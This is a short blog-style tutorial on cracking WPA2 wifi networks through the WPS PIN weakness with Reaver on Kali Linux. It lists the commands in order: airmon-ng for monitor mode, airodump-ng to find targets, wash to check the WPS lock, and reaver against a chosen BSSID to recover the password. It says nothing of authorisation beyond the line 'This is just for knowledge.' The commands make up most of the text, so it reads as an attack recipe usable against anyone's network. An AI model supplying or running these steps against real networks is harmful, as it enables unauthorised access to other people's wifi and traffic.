Cracking WPA2 wifi network using 'Reaver' in kali linux.
HelloToday i am gonna share you how to crack a WPA 2 wifi network using reaver in kali.
First check your wireless adapter is ready or not.
Check using commamd
Then change that wireless adapter into monitor mode if ready.
airmon-ng wlan0
now lets do some air attack using airodump
airodump-ng mon0
then find the network that you want to crack
now check whether the network have wps locked or not
wash -i mon0 -c <channel no.> -C -s
If you see 'No' under wps locked then you can crack that wifi network
reaver -i mon0 -b <bssid> --fail-wait=360
keep calm and wait, this will take so long time, i have waited more than 12 hours.
At last you will see the password on the screen.
This is just for knowledge.
If you have problem creating monitor mode wireless adapter, do following:
1. ifconfig wlan0 down
2. iwconfig wlan0 mode monitor
3. ifconfig wlan0 up
And replace every mon0 by wlan0 in the cracking process.
Thank you.